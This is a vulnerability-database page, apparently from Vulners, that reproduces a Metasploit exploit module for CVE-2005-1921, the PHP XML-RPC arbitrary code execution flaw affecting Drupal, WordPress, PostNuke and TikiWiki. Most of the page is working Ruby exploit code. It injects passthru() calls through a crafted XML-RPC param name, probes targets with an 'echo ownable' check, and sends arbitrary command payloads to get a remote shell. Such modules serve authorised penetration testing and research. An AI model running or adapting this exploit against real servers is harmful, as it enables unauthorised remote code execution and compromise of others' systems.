Lucene search
K

PHP XML-RPC Arbitrary Code Execution

🗓️ 18 Feb 2007 00:10:39Reported by hdm <[email protected]>, cazz <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 115 Views

PHP XML-RPC Arbitrary Code Execution in many PHP web application

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD
postnuke -- multiple vulnerabilities
27 May 200500:00
freebsd
FreeBSD
pear-XML_RPC -- arbitrary remote code execution
29 Jun 200500:00
freebsd
FreeBSD
drupal -- PHP code execution vulnerabilities
29 Jun 200500:00
freebsd
ATTACKERKB
CVE-2005-2116
5 Jul 200504:00
attackerkb
CVE
CAN-2005-1921
11 Aug 202421:51
cve
CVE
CVE-2005-1921
1 Jul 200504:00
cve
Tenable Nessus
CentOS 3 / 4 : php (CESA-2005:564)
3 Jul 200600:00
nessus
Tenable Nessus
Debian DSA-745-1 : drupal - input validation errors
10 Jul 200500:00
nessus
Tenable Nessus
Debian DSA-746-1 : phpgroupware - input validation error
14 Jul 200500:00
nessus
Tenable Nessus
Debian DSA-747-1 : egroupware - input validation error
11 Jul 200500:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # XXX This module needs an overhaul
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP XML-RPC Arbitrary Code Execution',
      'Description'    => %q{
          This module exploits an arbitrary code execution flaw
        discovered in many implementations of the PHP XML-RPC module.
        This flaw is exploitable through a number of PHP web
        applications, including but not limited to Drupal, Wordpress,
        Postnuke, and TikiWiki.
      },
      'Author'         => [ 'hdm', 'cazz' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-1921'],
          ['OSVDB', '17793'],
          ['BID', '14088'],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Payload'        => {
          'Space' => 512,
          'DisableNops' => true,
          'Keys'  => ['cmd', 'cmd_bash'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2005-06-29'
      ))


    register_options(
      [
        OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
      ])

    deregister_options(
      'HTTP::junk_params', # not your typical POST, so don't inject params.
      'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
      )
  end

  def go(command)

    encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
    wrapper = rand_text_alphanumeric(rand(128)+32)

    cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"

    xml =
    '<?xml version="1.0"?>' +
    "<methodCall>" +
      "<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
      "<params><param>" +
        "<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
        "<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
      "</param></params>" +
    "</methodCall>";

    res = send_request_cgi({
        'uri'          => normalize_uri(datastore['PATH']),
        'method'       => 'POST',
        'ctype'        => 'application/xml',
        'data'         => xml,
      }, 5)

    if (res and res.body)
      b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
      if b
        return b.captures[0]
      elsif datastore['HTTP::chunked']
        b = /chunked Transfer-Encoding forbidden/.match(res.body)
        if b
          fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')
        end
      end
    end

    return nil
  end

  def check
    response = go("echo ownable")
    if (!response.nil? and response =~ /ownable/sm)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    response = go(payload.encoded)
    if response == nil
      print_error('exploit failed: no response')
    else
      if response.length == 0
        print_good('Exploit Successful')
      else
        print_status("Command returned #{response}")
      end
      handler
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation